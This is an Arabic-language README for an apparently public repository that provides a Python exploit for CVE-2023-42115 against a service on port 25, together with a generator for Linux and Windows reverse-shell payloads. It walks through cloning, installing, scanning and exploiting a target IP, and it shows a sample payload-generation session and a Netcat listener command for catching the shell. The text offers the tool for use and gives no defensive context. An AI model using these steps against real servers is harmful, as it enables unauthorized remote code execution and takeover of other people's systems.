
مولّد استغلال وحمولات القشرة العكسية مبني على بايثون لـ CVE-2023-42115، ويتميز بوضعي الفحص والاستغلال مع إنشاء حمولات متعددة المنصات.
يحتوي هذا المستودع على نصين بلغة بايثون:
exploit.py: نص لاستغلال الثغرة CVE-2023-42115.generate_payload.py: نص لتوليد حمولات الصدفة العكسية.قبل تشغيل النصوص، تأكد من تثبيت Python 3 على نظامك.
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
قم بتثبيت مكتبات بايثون المطلوبة باستخدام pip. شغّل الأمر التالي لتثبيت جميع التبعيات الضرورية المذكورة في requirements.txt:
pip install -r requirements.txt
exploit.py
يقوم هذا النص باستغلال الثغرة CVE-2023-42115.
python exploit.py -t <ip_الهدف> -p <منفذ_الهدف> [خيارات]
الخيارات:
-t: عنوان IP للهدف.
-p: منفذ الخدمة المستهدفة.
مثال:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
يقوم هذا النص بتوليد حمولة صدفة عكسية بناءً على إدخال المستخدم.
python generate_payload.py
الخطوات:
سيطلب منك النص المعلومات التالية:
أ. نوع الحمولة (linux أو windows)
ب. عنوان IP المحلي: للاتصال العكسي
ج. المنفذ المحلي: للاتصال العكسي ملاحظة: إذا كنت خلف موجه أو تستخدم NAT، تأكد من إعداد إعادة توجيه المنفذ الصحيح لجهازك الذي يشغل Netcat.
د. اسم ملف الإخراج (مثل payload.sh لنظام Linux أو payload.ps1 لنظام Windows)
مثال:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
تحتاج إلى إعداد مستمع على جهازك المحلي لاستقبال الصدفة العكسية. يمكنك استخدام Netcat (nc) لهذا الغرض.
nc -lvnp <المنفذ_المحلي>
nc -lvnp <المنفذ_المحلي>
باتباع هذه الخطوات، يجب أن تكون قادرًا على إنشاء واستخدام حمولة لاستغلال CVE-2023-42115 والحصول على اتصال صدفة عكسية.
إذا كانت لديك اقتراحات للتحسين أو ترغب في المساهمة، فيرجى فتح مشكلة (issue) أو تقديم طلب سحب (pull request).
للاستفسارات أو الدعم، يرجى الاتصال
[email protected]